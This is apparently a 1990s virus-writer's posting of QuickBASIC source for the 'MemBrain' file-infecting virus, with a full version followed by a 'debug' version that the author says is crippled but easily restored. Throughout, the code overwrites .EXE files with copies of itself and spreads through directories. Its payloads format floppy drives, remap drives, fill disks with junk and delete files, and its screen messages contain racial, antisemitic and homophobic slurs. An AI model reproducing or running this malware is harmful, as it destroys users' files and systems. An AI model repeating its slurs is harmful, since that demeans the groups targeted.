LINE INPUT #1, A$NEXTLINE INPUT #1, A$FIN1:LINE INPUT #1, A$FIN2:GETNEXT:Z = Z + 1f$ = "": A$ = "": B$ = "": A = 0LINE INPUT #1, A$IF LEFT$(A$, 1) = " " THEN GOTO FIN0FOR A = 1 TO LEN(A$)B$ = MID$(A$, A, 1)IF B$ = " " THEN GOTO FIN3f$ = f$ + B$NEXTFIN3:V = LEN(f$)c = A - Vf$ = ""IF A$ = "" THEN GOTO FIN0FOR A = c TO LEN(A$)B$ = MID$(A$, A, 1)f$ = f$ + B$IF B$ = " " THEN GOTO FIN4NEXTFIN4:f$ = MID$(f$, 1, LEN(f$) - 1)ext$ = MID$(A$, 10, 3)IF UCASE$(ext$) <> "EXE" THEN GOTO NARXTIF f$ = "" OR INSTR(f$, " ") THEN GOTO FIN0CONT:IF f$ = "TEMP" THEN IF ext$ = "TMP" THEN GOTO NARXTCLOSE #2, #3, #9, #4OPEN f$ + "." + ext$ FOR INPUT AS #9IF LOF(9) = 0 THEN CLOSE #9: GOTO NARXTLINE INPUT #9, FULL$CLOSE #9IF INSTR(FULL$, "MEMBRAIN") OR INSTR(FULL$, "MBRAIN") THEN FULL$ = "": GOTO NARXTFULL$ = ""CLOSE #13OPEN f$ + "." + ext$ FOR INPUT AS #13IF LOF(13) = 0 THEN CLOSE #13: GOTO NARXTIF LOF(13) < 20 THEN CLOSE #13: GOTO NARXTLINE INPUT #13, EHX$IF MID$(EHX$, 1, 2) <> "MZ" THEN CLOSE #13: GOTO NARXTCLOSE #13

SHELL "ATTRIB " + f$ + "." + ext$ + " > TEMPO.TMP"OPEN "TEMPO.TMP" FOR INPUT AS #7LINE INPUT #7, ATR$

CLOSE #7KILL "TEMPO.TMP"ATRR$ = MID$(ATR$, 1, 10)IF INSTR(ATRR$, "A") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +A"IF INSTR(ATRR$, "S") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +S"IF INSTR(ATRR$, "R") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +R"IF INSTR(ATRR$, "H") THEN ATTRIBUTE$ = ATTRIBUTE$ + " +H"KILL f$ + "." + ext$CLOSE #2, #3OPEN NAME$ FOR BINARY AS #2OPEN f$ + "." + ext$ FOR BINARY AS #3DOBuffer = Buffer + 1GET 2, , byte(Buffer)PUT 3, , byte(Buffer)LOOP UNTIL EOF(2)CLOSE #2: CLOSE #3INFECTEDEXES = INFECTEDEXES + 1IF ATTRIBUTE$ = "" THEN GOTO NARXTSHELL "ATTRIB " + ATTRIBUTE$ + " " + f$ + "." + ext$ATTRIBUTE$ = ""NARXT:IF Z > 15 THEN GOTO EndOfLineIF INFECTEDEXES < 3 THEN GOTO GETNEXTABORT:FIN0:IF INFECTEDEXES < 3 THENSHELL "IF EXIST ATTRIB -H -R TEMP.TMP"RESETON ERROR GOTO ConT2KILL "TEMP.TMP"ConT2:SHELL "CD > CD.TMP"OPEN "CD.TMP" FOR INPUT AS #5LINE INPUT #5, CURRDIR$CLOSE #5KILL "CD.TMP"FOR L = 1 TO LEN(CURRDIR$)L$ = MID$(CURRDIR$, L, 1)IF L$ = "\" THEN SLASH = SLASH + 1NEXTIF SLASH = 1 THEN GOTO EndOfLineCHDIR ".."GOTO MAINEND IFGOTO EndOfLinePRINT "ThA MEmBRaIN ViRuS, CrEAtEd By br0k3n AkA Phr0ck Of wwS n eK"PRINT "1sT ViRii MadE wIt QuickBasic 4.5 UsINg MaH DirD0s EnGINe2"PRINT "GrEEtSZ: chron1c, #got-root, (icesk you faggit lamuR i oWn"PRINT "j00 n0w N fOR EVaH!!), BladedApple (Phlubber), 40HEX, SLAM,"PRINT "29A, XINE, HEXFILES, An All DaH nIgG4z OuT tHeRe! hEh!"

PRINT "FUCK THE MELISSA VIrUOs, tHAt sHyTe WaS tayMEd An lAyMe!"PRINT "mOrE vIrII cOmmING 2 yA Fr0M phr0ck (kRIMSON kAPER)"EndOfLine:SHELL "IF EXIST ATTRIB -H -R TEMP.TMP"RESETON ERROR GOTO SHNATKILL "TEMP.TMP"SHNAT:END

FUNCTION CRYPT$ (CODE$)CODE = ASC(CODE$) '+ ASC(RIGHT$(CODE$, 1)) + LEN(CODE$)FOR A = 1 TO LEN(A$)B$ = MID$(A$, A, 1)B = ASC(B$)B = B + CODEIF B > 255 THEN B = 255 - CODEIF B < 1 THEN B = 255 - CODEBAX$ = BAX$ + CHR$(B)NEXT ACRYPT$ = BAX$END FUNCTION

FUNCTION CurrentDirectory$SHELL "CD >CD.TXT"f% = FREEFILEOPEN "I", f%, "CD.TXT"LINE INPUT #f%, CD$CLOSE f%KILL "CD.TXT"CurrentDirectory$ = CD$END FUNCTION

FUNCTION DECRYPT$ (CODE$)DECRYPT$ = A$FOR A = 1 TO LEN(BAX$)B$ = MID$(BAX$, A, 1)B = ASC(B$)B = B - CODEIF B > 255 THEN B = 255 - CODEIF B < 1 THEN B = 255 - CODEA$ = A$ + CHR$(B)NEXT AEND FUNCTION

SUB DELAY (howlong!)N! = TIMERDO: LOOP WHILE TIMER - N! < howlong!END SUB

FUNCTION NAME$

DIM MCODE(1 TO 7) AS INTEGER, OS AS INTEGER, BX AS INTEGER, DUMMY AS LONGDEF SEG = VARSEG(MCODE(1))OS = VARPTR(MCODE(1))POKE OS, &H55'PUSH BPPOKE OS + 1, &H89: POKE OS + 2, &HE5'MOV BP,SPPOKE OS + 3, &HB4: POKE OS + 4, &H62'MOV AH,62POKE OS + 5, &HCD: POKE OS + 6, &H21'INT 21POKE OS + 7, &H8B: POKE OS + 8, &H7E: POKE OS + 9, 6'MOV DI,[BP+6]POKE OS + 10, &H89: POKE OS + 11, &H1D'MOV [DI],BXPOKE OS + 12, &H5D'POP BPPOKE OS + 13, &HCB'RETFCALL ABSOLUTE(BX, OS)DEF SEG = BXENVSM = PEEK(&H2C) + 256 * PEEK(&H2D)ENVOS = 0DEF SEG = ENVSMDUMMY = 0&WHILE DUMMY <> 65536DUMMY = PEEK(ENVOS) + 256& * (PEEK(ENVOS + 1) + 256& * (PEEK(ENVOS + 2) + 256& * PEEK(ENVOS + 3)))ENVOS = ENVOS + 1WENDENVOS = ENVOS + 3N$ = ""A = 1WHILE A <> 0A = PEEK(ENVOS)IF A <> 0 THEN N$ = N$ + CHR$(A)ENVOS = ENVOS + 1WENDDEF SEGNAME$ = N$END FUNCTION

SUB PayloadDEFSNG LRANDOMIZE TIMER

XBRAIN1$ = "YOU ARE LUCKY, YOU MUST BE A FRIEND OF phr0q, MEMBRAIN"XBRAIN2$ = "WILL *NOT* INFECT YOU AS LONG AS YOU HAVE THIS FILE!:)"XBRAIN3$ = " -A friend of phr0q is a friend of mine!-"MSG691$ = "HELLO, MY NAME IS MemBrain, I AM NOW A PART OF YOUR WHITE ASS!"MSG692$ = "Whats a matter, mixed up? Thats the effects of drugs on your brain man!"MSG693$ = " ReSpEkt ThA ThrobBin PuLsE!"CLOSEOPEN "C:\XBRAIN.MEM" FOR BINARY AS #6CLOSE #6OPEN "C:\XBRAIN.MEM" FOR INPUT AS #6IF LOF(6) < LEN("INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN GOTO FIZZLINE INPUT #6, FD$CLOSE #1IF INSTR(UCASE$(FD$), "INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN

CLOSEPRINT XBRAIN1$PRINT XBRAIN2$PRINT XBRAIN3$SOUND 2600, 1SOUND 500, 1SOUND 3002, 2KILL NAME$ENDEND IFFIZZ:CLOSE #6

DRIV$ = MID$(CurrentDirectory$, 1, 2)IF INSTR(DATE$, "4") THENIF INSTR(DATE$, "2") THENIF INSTR(DATE$, "0") THENIF UCASE$(DRIV$) = "A:" THEN SHELL "FORMAT A: /AUTOTEST"END IFEND IFEND IF

IF MID$(TIME$, 1, 5) = "06:09" THENCLSCOLOR 8PRINT MSG691$COLOR 15PRINT MSG692$COLOR 1PRINT MSG693$

SHELL "SUBST A: " + CurrentDirectory$SHELL "SUBST C: A:"COLOR 8PRINT "HeHEHhEHeH SPeKT THa Masta Phr0Ck"END IF

IF MID$(TIME$, 1, 5) = "04:20" THENCLSCOLOR 12PRINT "Hey, white boi, sometimes brains CAN get tumors TOO..!": COLOR 3PRINT "Coming soon: The HIV >> AiDS-X Virus:) by phr0ck aka br0k3n"DELAY 2OPEN CHR$(255) + CHR$(255) + "CANCER.___" FOR APPEND AS #6CLOSE #6KILL CHR$(255) + CHR$(255) + "CANCER.___"OPEN CHR$(255) + CHR$(255) + "CANCER.___" FOR APPEND AS #6FOR I = 1 TO 5000IF INT(I / 500) = I / 500 THEN PRINT ".";FOR J = 1 TO 2

c$ = c$ + CHR$(J)NEXTNEXTK = 0DOPRINT #1, c$LOCATE 15, 1: PRINT "KB: "; KL! = L / 1000LOCATE 16, 1: PRINT "MEGS: "; LK = K + 10LOOPEND IF

IF MID$(DATE$, 1, 5) = "05-09" THENCLSCOLOR 4PRINT "REJOICE! ITS MY BIRTHDAY!! LOOK:"COLOR 3PRINT "----------------------------------------------------------"COLOR 1PRINT "DIGI-BIRTH CERTIFICATE OF: "; : COLOR 12: PRINT "MEMBRAIN VIRUS, THE"; : COLOR 3: PRINT " ---"COLOR 7PRINT "DATE OF BIRTH:"; : COLOR 15: PRINT " SUNDAY MAY 9, 1999"; : COLOR 3: PRINT " ---"COLOR 7PRINT "FATHER'S NAME:"; : COLOR 15: PRINT " phr0ck aka Krimson Kaper, br0k3n, hwulf"; : COLOR 3: PRINT " ---"COLOR 7PRINT "MOTHER'S NAME:"; : COLOR 15: PRINT " Microsoft Compiler QuickBasic 4.5"; : COLOR 3: PRINT " ---"COLOR 7PRINT "WEIGHT:"; : COLOR 15: PRINT " 59.5 Kilobytes (k = 1000 Bytes) "; : COLOR 3: PRINT " ---"COLOR 3PRINT "----------------------------------------------------------"'--------LPRINT "REJOICE! ITS MY BIRTHDAY!! LOOK:"LPRINT "----------------------------------------------------------"LPRINT "DIGI-BIRTH CERTIFICATE OF: MEMBRAIN VIRUS, THE ---"LPRINT "DATE OF BIRTH: WEDNESDAY MARCH 31, 1999 ---"LPRINT "FATHER'S NAME: phr0ck aka Krimson Kaper, br0k3n, hwulf ---"LPRINT "MOTHER'S NAME: Microsoft Compiler QuickBasic 4.5 ---"LPRINT "BABY'S SIZE: 59.5 Kilobytes ---"LPRINT "----------------------------------------------------------"LPRINT ""LPRINT ""LPRINT "Hi there. I guess i am stuck with you..well hi. I am kinda"LPRINT "shy, so pardon the shyness. As you know i am a virus. Please,"LPRINT "i ALWAYS get that reaction. We virii have a bad rep, but I"LPRINT "guess i can understand. Well...hi! Its my birthday just to"LPRINT "let you know. My name is MemBrain, treat me nice of i'll fuck"LPRINT "your computer up! Wigga!:)) Heh! Fag. Bye. Say hiye to phr0ck!"ZZTOP = INT(RND * 10) + 1IF ZZTOP = 6 THEN SHELL "SUBST A: " + CurrentDirectory$IF ZZTOP = 9 THEN SHELL "SUBST C: A:"

DOSOUND 2700, 1SOUND 333, 1SOUND 3953, 1SOUND 3452, 1SOUND 2095, 1SOUND 994, 1LOOPEND IF

c$ = CurrentDirectory$: d$ = LEFT$(DATE$, 5)IF (c$ = "C:\HACKING") OR (c$ = "C:\QBASIC") OR (c$ = "C:\QB45") OR (d$ = "05-03") OR (d$ = "06-09") OR (d$ = "12-24") OR (d$ = "12-29") OR (d$ = "07-04") OR (d$ = "04-02") THENCLSCX = 6BX = 12MX = 1COLOR CXPRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR MX: PRINT " ThE"; : COLOR CX: PRINT " ±°"PRINT "±°"; : COLOR 15: PRINT " ,$$$$. .$$$$, .$$$$$$$' ,$$$$ $$$$, "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 7: PRINT " $$$$$$$$ $$$$$$$$ $$$$$ $$$$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 8: PRINT " $$$$$$ $ $$$$$$ $$$$$$$$) $$$$$$ $ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 7: PRINT " $$$$$$ $$$$$$ $$$$$ $$$$$$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 15: PRINT " `$$' `$$' `$$$$$$$, `$$' `$$' "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 9: PRINT " cReaTed By phr0ck (aka Krimson Kaper,br0k3n,hwulf) "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " $$$$$$$$$. ,$$$$$$$$, ,$$$$$$, `$$$$$$$$$' ,$$$$. ,$$$$. "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$ $$$' `$$$ `$$$' $$$$$$$$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$$$$$$$ $$$$$$$$$, $$$$$$$$$$ $$$ $$$$$$ $$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$$ $$$ $$$ .$$$. $$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " $$$$$$$$$' `$$$ $$$, `$$ $$' .$$$$$$$$$. `$$' `$$' "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " ViRuS "; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR 14: PRINT " The MemBrain vIrUs owNs YOu! "; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR 5: PRINT "oH gAwd, ThIs mEssAge alon3 iS a CoUple Of K's WeRth! WeLL sUckEr, You"; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 5: PRINT " hAvE beEn oUt SmArtEd bY thA MemBraIn! We vIruSes HaVe livEs T00 yA "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 5: PRINT "know!! PlEaSe gIVe uS a LiTtlE mOrE reSpekT! StOp tHe KillINg of vIrii"; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"DELAY 15DOX = INT(RND * 1000)KEY$ = INKEY$CLSCOLOR 15PRINT "IN-"; : PLAY "L15AD"PRINT "SANE "; : PLAY "L15CD"

PRINT "IN"; : PLAY "L15GD"PRINT " DA "; : PLAY "L15AC"PRINT "MEM-"; : PLAY "L15DF"PRINT "BRAIN"; : PLAY "L15A"PRINT " IN-"; : PLAY "L13AG"PRINT "SANE "; : PLAY "L13GA"PRINT "IN-"; : PLAY "L13BC"PRINT "DA "; : PLAY "L13FG"PRINT "BRAIN@!@"DELAY 1COLOR 8IF KEY$ <> "" THEN PRINT "PHR0CK AND HIS PET THE MEMBRAIN VIRUS OWNZ YOUR SORRY WHITE ASS!": DELAY 1IF KEY$ <> "" THEN PRINT "GREETZ TO ALL MAH VIRII AND NIGGAZ AT eK, Got-Root, N HEH, qBASIC": DELAY 1IF KEY$ <> "" THEN PRINT "ICESK: FUCK YOUR WHITE ASS ARYAN FUCKER!@ BLACKPANTHER COMING SOON": DELAY 1IF KEY$ <> "" THEN PRINT "AHH SHIT NIGGA, FUQ DEM JEWS AND B00ZE! -ALL VXers UNITE 1 N ALL!!": DELAY 1IF KEY$ <> "" THEN COLOR 20: PRINT "HA HA HA HA HA HA HA HA HA YOUR INFECTED WITH THE MEMBRAIN VIRUS!!": DELAY 2IF KEY$ <> "" THEN COLOR 7: PRINT "CREATED BY ME (phr0ck OF COURSE, IN KEW BEEE!!!!": DELAY 2LOOP UNTIL X = 420KILL DECRYPT$("43")COLOR 3PRINT "CYPRESS HILL "; : COLOR 15: PRINT "SOUNDS GOOD. KER PLUNK, ITS A HARD NOC LYPHE!"DELAY 3CLSEND IFEND SUB

---[End Cut!]

That was the newer model of the Membrain VIrus, somewhat better improved. Here was the older one. i crippled it in a way that it wont infect but i would comment KILL lines out if i were you because i accidentally deleted a lot of my files that way! HEH. silly me. Here is a "DEBUG" version of the membrain virus:

---------- MBtext.bas [Cut Here]

'The Membrain Virus, The First actual *WORKING*'Virus made with QuickBASIC 4.5.'programmmed by phr0q'questions or comments go to:'phr0q@budlight.com'First release of this version. This is only'a debug version of the membrain source code, this'is a crippled version just uncomment the stuff. this made'so that you can analyze this. If you dont believe it works'just run it! Nothing bad will happen, just a simulation of'infection. For the full normal source for The Membrain Virus

'please check out my site: http://phr0q.com/membrain/membrain.bas'for the exe: http://phr0q.com/membrain/membrain.zip'Shouts to: nugz, mike, mel, sSh and ... to icesk you vxER wanna beh.'#virus ! #quickbasic ! @efnet'(C)opyrite phr0q 1999

DECLARE SUB DELAY (howlong!)DECLARE SUB PAYLOAD ()DECLARE FUNCTION NAME$ ()DIM byte(1 TO 12000)DIM Buffer AS LONG

COMMON SHARED F$, EXT$CLSMAIN:CLOSESHELL "IF EXIST DEL TEMP.tmp"SHELL "DIR " + " *.* > TEMP.tmp"'-------------------------------------SHELL "ATTRIB +H +R TEMP.tmp"PRINT "OPENING TEMP FILE..."OPEN "TEMP.tmp" FOR INPUT AS #1PRINT "TEMP FILE OPENED..."

FOR A = 1 TO 5LINE INPUT #1, A$NEXT

LINE INPUT #1, A$'FOR A = 1 TO LEN(A$)'B$ = MID$(A$, A, 1)'IF B$ = " " THEN GOTO FIN1'F$ = F$ + B$'NEXT

FIN1:'F$ = MID$(F$, 1, LEN(F$) - 1)' PRINT F$ + " " + STR$(LEN(F$)) + " ROOT DIRECTORY"'B$ = "": F$ = "": A$ = ""LINE INPUT #1, A$

'FOR A = 1 TO LEN(A$)'B$ = MID$(A$, A, 1)'F$ = F$ + B$'IF B$ = " " THEN GOTO FIN2'NEXT

FIN2:'F$ = MID$(F$, 1, LEN(F$) - 1)' PRINT F$ + " " + STR$(LEN(F$)) + " PARENT DIRECTORY"

'----------GETTING ROOT, PARENT AND CHECKING IF ANY FILES EXIST-------------'

GETNEXT:Z = Z + 1

F$ = "": A$ = "": B$ = "": A = 0

LINE INPUT #1, A$IF LEFT$(A$, 1) = " " THEN GOTO FIN0 'CHECK IF THIS IS THE END OF FILE LISTING

FOR A = 1 TO LEN(A$)B$ = MID$(A$, A, 1)IF B$ = " " THEN GOTO FIN3F$ = F$ + B$NEXT

FIN3:V = LEN(F$) '- 1 '-1 BECAUSE OF THAT 1 SPACEC = A - VF$ = ""IF A$ = "" THEN GOTO FIN0 ' =---------------------OR INSTR(A$, " ")FOR A = C TO LEN(A$)B$ = MID$(A$, A, 1)F$ = F$ + B$IF B$ = " " THEN GOTO FIN4NEXT

FIN4:

F$ = MID$(F$, 1, LEN(F$) - 1)PRINT F$ + " " + STR$(LEN(F$))'CLOSE'ENDPRINT F$ + " " + STR$(LEN(F$)) ' = MID$(F$, 1, LEN(F$))EXT$ = MID$(A$, 10, 3)PRINT "HOST: " + F$ + "." + EXT$

'---------IF EXT$ = " " OR EXT$ = "" THEN EXT$ = "DIRECTORY": GOTO NARXTIF UCASE$(EXT$) <> "EXE" THEN PRINT "ERROR, NOT AN .EXE FILE": SOUND 4555, 1: SLEEP: GOTO NARXT'IF INSTR(F$, " ") THEN GOTO NARXTIF F$ = "" OR INSTR(F$, " ") THEN GOTO FIN0CONT:IF F$ = "TEMP" THEN IF EXT$ = "TMP" THEN GOTO NARXT

PRINT "ATTEMPTING TO INFECTING FILE: " + F$ + "." + EXT$PRINT "CHECKING FOR PREVIOUS FILE INFECTION..."

CLOSE #2, #3, #9, #4PRINT "OPENING THE HOST FILE FOR PREVIOUS INFECTION CHECK..."PRINT F$ + "." + EXT$DO: LOOP UNTIL INKEY$ <> ""

OPEN F$ + "." + EXT$ FOR INPUT AS #9PRINT "HOST FILE OPENED FOR PREVIOUS INFECTION CHECK..."IF LOF(9) = 0 THEN CLOSE #9: GOTO NARXTLINE INPUT #9, FULL$CLOSE #9IF INSTR(FULL$, "MEMBRAIN") THEN PRINT "FILE ALREADY INFECTED!!": SLEEP: FULL$ = "": GOTO NARXTFULL$ = ""

COLOR 6PRINT "EXTENSION OF FILE: " + EXT$ + " " + STR$(LEN(EXT$))COLOR 4

'--------------iNFECTiN PRoCeSS--------------PRINT "PRESS ANY KEY TO INFECT A FILE!!"SLEEPCOLOR 1SOUND 2600, 4PRINT "INFECTING FILE: " + F$ + "." + EXT$ + " " + STR$(LEN(F$ + "." + EXT$))CLOSE #13COLOR 15PRINT "PASSING HOST THROUGH INSPECTION..."

OPEN F$ + "." + EXT$ FOR INPUT AS #13IF LOF(13) = 0 THEN CLOSE #13: GOTO NARXTLINE INPUT #13, EHX$IF MID$(EHX$, 1, 2) <> "MZ" THEN CLOSE #13: PRINT "FAKE HEADER DETECTED!!!...": SLEEP: GOTO NARXTCLOSE #13PRINT "INSPECTION FINISHED..."COLOR 1

PRINT "KILL F$ + '.' + EXT$"

KILL F$ + "." + EXT$ PRINT "DONE KILL F$ + '.' + EXT$"

COLOR 8PRINT "CURRENT PROGRAM " + NAME$COLOR 1SLEEPGOTO heraCLOSE #2, #3OPEN NAME$ FOR BINARY AS #2OPEN F$ + "." + EXT$ FOR BINARY AS #3DOBuffer = Buffer + 1GET 2, , byte(Buffer)PUT 3, , byte(Buffer)LOOP UNTIL EOF(2)CLOSE #2: CLOSE #3hera:

INFECTEDEXES = INFECTEDEXES + 1SOUND 2600, 10PRINT "DONE INFECTING FILE..."COLOR 7SLEEP'============COLOR 7NARXT:

IF Z > 15 THEN GOTO ENDOFLINEIF INFECTEDEXES < 3 THEN GOTO GETNEXT

'-----------GET A FILE OR DIRECTORY, JUDGE WETHER ITS A DIR OR NOT-----------GOTO FIN0ABORT:FIN0:

IF INFECTEDEXES < 3 THENSHELL "IF EXIST ATTRIB -H -R TEMP.TMP"RESETON ERROR GOTO OHSHIATKILL "TEMP.TMP"GOTO ConT2OHSHIAT:PRINT "SHIT!!..ERROR DELETING THE 'TEMP.TMP' FILE!!"ConT2:SHELL "CD > CD.TMP"OPEN "CD.TMP" FOR INPUT AS #5LINE INPUT #5, CURRDIR$CLOSE #5KILL "CD.TMP"FOR L = 1 TO LEN(CURRDIR$)L$ = MID$(CURRDIR$, L, 1)IF L$ = "\" THEN SLASH = SLASH + 1NEXTIF SLASH < 2 THEN GOTO ENDOFLINE 'MEANS WE ARE IN ROOT DIRECTORY

PRINT "CHANGING DIR.."CHDIR ".."GOTO MAINEND IF

ENDOFLINE:SHELL "IF EXIST ATTRIB -H -R TEMP.TMP"RESETON ERROR GOTO SHNATKILL "TEMP.TMP"SHNAT:END

SUB DELAY (howlong!)N! = TIMERDO: LOOP WHILE TIMER - N! < howlong!END SUB

FUNCTION NAME$'' Set up machine code routine and call it to get PSP.'DIM MCODE(1 TO 7) AS INTEGER, OS AS INTEGER, BX AS INTEGER, DUMMY AS LONGDEF SEG = VARSEG(MCODE(1))OS = VARPTR(MCODE(1))POKE OS, &H55'PUSH BPPOKE OS + 1, &H89: POKE OS + 2, &HE5'MOV BP,SPPOKE OS + 3, &HB4: POKE OS + 4, &H62'MOV AH,62POKE OS + 5, &HCD: POKE OS + 6, &H21'INT 21POKE OS + 7, &H8B: POKE OS + 8, &H7E: POKE OS + 9, 6'MOV DI,[BP+6]POKE OS + 10, &H89: POKE OS + 11, &H1D'MOV [DI],BXPOKE OS + 12, &H5D'POP BPPOKE OS + 13, &HCB'RETFCALL ABSOLUTE(BX, OS)'' Point memory pointer to program segment prefix.'DEF SEG = BX'' Get memory location where DOS environment copy begins and point memory' pointer there.'ENVSM = PEEK(&H2C) + 256 * PEEK(&H2D)ENVOS = 0DEF SEG = ENVSM'' Look in memory for four bytes equalling a LONG integer of 65,536.' (Note that DUMMY was DIMmed as such a LONG integer above.)'DUMMY = 0&WHILE DUMMY <> 65536DUMMY = PEEK(ENVOS) + 256& * (PEEK(ENVOS + 1) + 256& * (PEEK(ENVOS + 2) + 256& * PEEK(ENVOS + 3)))ENVOS = ENVOS + 1WENDENVOS = ENVOS + 3'' ENVOS is now the offset into the memory segment at ENVSM where your' program name starts. Concatenate the characters in that string into' NAME$ until the ASCII 0 is reached, updating ENVOS along the way.'N$ = ""A = 1WHILE A <> 0A = PEEK(ENVOS)

IF A <> 0 THEN N$ = N$ + CHR$(A)ENVOS = ENVOS + 1WENDDEF SEG'' N$ is the program name; set NAME$ equal to it and exit function.'NAME$ = N$END FUNCTION

SUB PAYLOAD'ON ERROR GOTO SHOOPDEYOOPOPEN "C:\XBRAIN.MEM" FOR INPUT AS #6LINE INPUT #6, FD$CLOSE #1IF INSTR(UCASE$(FD$), "INSANE IN THE MEMBRAIN INSANE IN THE BRAIN") THEN CLOSE : KILL NAME$: ENDSHOOPDEYOOP:

CLSCX = 6BX = 12MX = 1COLOR CXPRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR MX: PRINT " ThE"; : COLOR CX: PRINT " ±°"PRINT "±°"; : COLOR 15: PRINT " ,$$$$. .$$$$, .$$$$$$$' ,$$$$ $$$$, "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 7: PRINT " $$$$$$$$ $$$$$$$$ $$$$$ $$$$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 8: PRINT " $$$$$$ $ $$$$$$ $$$$$$$$) $$$$$$ $ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 7: PRINT " $$$$$$ $$$$$$ $$$$$ $$$$$$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 15: PRINT " `$$' `$$' `$$$$$$$, `$$' `$$' "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 9: PRINT " cReaTed By phr0ck (aka Krimson Kaper,br0k3n,hwulf) "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " $$$$$$$$$. ,$$$$$$$$, ,$$$$$$, `$$$$$$$$$' ,$$$$. ,$$$$. "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$ $$$' `$$$ `$$$' $$$$$$$$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$$$$$$$ $$$$$$$$$, $$$$$$$$$$ $$$ $$$$$$ $$ $$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR BX: PRINT " $$$$ $$$ $$$$ $$$ $$$ $$$ .$$$. $$$$$$ $$$$$$$$ "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " $$$$$$$$$' `$$$ $$$, `$$ $$' .$$$$$$$$$. `$$' `$$' "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 4: PRINT " ViRuS "; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR 14: PRINT " The MemBrain vIrUs owNs YOu! "; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"PRINT "±°"; : COLOR 5: PRINT "oH gAwd, ThIs mEssAge alon3 iS a CoUple Of K's WeRth! WeLL sUckEr, You"; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 5: PRINT " hAvE beEn oUt SmArtEd bY thA MemBraIn! We vIruSes HaVe livEs T00 yA "; : COLOR CX: PRINT "±°"PRINT "±°"; : COLOR 5: PRINT "know!! PlEaSe gIVe uS a LiTtlE mOrE reSpekT! StOp tHe KillINg of vIrii"; : COLOR CX: PRINT "±°"PRINT "±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°±°"DELAY 15DOKEY$ = INKEY$CLS

COLOR 15PRINT "IN-"; : PLAY "L15AD"PRINT "SANE "; : PLAY "L15CD"PRINT "IN"; : PLAY "L15GD"PRINT " DA "; : PLAY "L15AC"PRINT "MEM-"; : PLAY "L15DF"PRINT "BRAIN"; : PLAY "L15A"PRINT " IN-"; : PLAY "L13AG"PRINT "SANE "; : PLAY "L13GA"PRINT "IN-"; : PLAY "L13BC"PRINT "DA "; : PLAY "L13FG"PRINT "BRAIN@!@"DELAY 1COLOR 8IF KEY$ <> "" THEN PRINT "PHR0CK AND HIS PET THE MEMBRAIN VIRUS OWNZ YOUR SORRY WHITE ASS!": DELAY 1IF KEY$ <> "" THEN PRINT "GREETZ TO ALL MAH VIRII AND NIGGAZ AT eK, Got-Root, N HEH, qBASIC": DELAY 1IF KEY$ <> "" THEN PRINT "ICESK: FUCK YOUR WHITE ASS ARYAN FUCKER!@ BLACKPANTHER COMING SOON": DELAY 1IF KEY$ <> "" THEN PRINT "AHH SHIT NIGGA, FUQ DEM JEWS AND B00ZE! -ALL VXers UNITE 1 N ALL!!": DELAY 1IF KEY$ <> "" THEN COLOR 20: PRINT "HA HA HA HA HA HA HA HA HA YOUR INFECTED WITH THE MEMBRAIN VIRUS!!": 